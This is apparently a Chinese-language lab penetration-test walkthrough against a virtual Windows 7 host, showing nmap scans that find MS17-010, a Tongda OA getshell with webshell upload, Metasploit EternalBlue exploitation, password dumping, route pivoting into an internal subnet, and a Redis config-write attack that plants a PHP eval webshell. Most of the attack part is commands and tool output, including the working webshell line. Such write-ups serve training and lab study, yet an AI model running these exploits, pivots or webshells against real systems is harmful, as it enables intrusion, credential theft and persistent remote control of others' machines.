nmap -sS -A 192.168.12.136 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 03:20 EST Nmap scan report for 192.168.12.136 Host is up (0.00077s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http nginx |_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3 | http-robots.txt: 1 disallowed entry |_/ | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) MAC Address: 00:0C:29:B6:97:9F (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows Vista|2008|7 OS CPE: cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7 OS details: Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 Network Distance: 1 hop Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: win7-PC | NetBIOS computer name: WIN7-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-02-24T16:20:29+08:00 |_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s |_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:b6:97:9f (VMware) | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2022-02-24T08:20:29 |_ start_date: 2022-02-24T07:19:44
TRACEROUTE HOP RTT ADDRESS 1 0.77 ms 192.168.12.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.05 seconds
nmap --script=vuln 192.168.12.136 -p 445,139,135 -T4 -v Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 03:46 EST NSE: Loaded 105 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 03:46 Completed NSE at 03:46, 10.00s elapsed Initiating NSE at 03:46 Completed NSE at 03:46, 0.00s elapsed Initiating ARP Ping Scan at 03:46 Scanning 192.168.12.136 [1 port] Completed ARP Ping Scan at 03:46, 0.06s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 03:46 Completed Parallel DNS resolution of 1 host. at 03:46, 0.01s elapsed Initiating SYN Stealth Scan at 03:46 Scanning 192.168.12.136 [3 ports] Discovered open port 139/tcp on 192.168.12.136 Discovered open port 445/tcp on 192.168.12.136 Discovered open port 135/tcp on 192.168.12.136 Completed SYN Stealth Scan at 03:46, 1.14s elapsed (3 total ports) NSE: Script scanning 192.168.12.136. Initiating NSE at 03:46 Completed NSE at 03:46, 14.99s elapsed Initiating NSE at 03:46 Completed NSE at 03:46, 0.00s elapsed Nmap scan report for 192.168.12.136 Host is up (0.00062s latency).
PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:B6:97:9F (VMware)
Host script results: |_smb-vuln-ms10-054: false |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
NSE: Script Post-scanning. Initiating NSE at 03:46 Completed NSE at 03:46, 0.00s elapsed Initiating NSE at 03:46 Completed NSE at 03:46, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds Raw packets sent: 6 (248B) | Rcvd: 4 (160B)
扫出存在ms17-010,且80端口开启了http服务
三、通达OA-Getshell
访问80端口,是一个通达OA系统
直接上通达OA综合利用工具
上传webshell,后使用蚁剑相连
四、ms17-010
使用exploit/windows/smb/ms17_010_eternalblue,设置好ip
获取密码
发现内网网段
进程迁移 run post/windows/manage/migrate
添加路由 run post/multi/manage/autoroute
扫描另一个网段
1 2 3 4 5 6 7 8
msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) > set ports 22,23,80,443,8080,8081,3389,445,143,6379 ports => 22,23,80,443,8080,8081,3389,445,143,6379 msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.0.20.0/24 rhosts => 10.0.20.0/24 msf6 auxiliary(scanner/portscan/tcp) > set threads 20 threads => 20 msf6 auxiliary(scanner/portscan/tcp) > run
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/" OK 10.0.20.99:6379> config set dbfilename shell.php OK 10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>" OK 10.0.20.99:6379> save
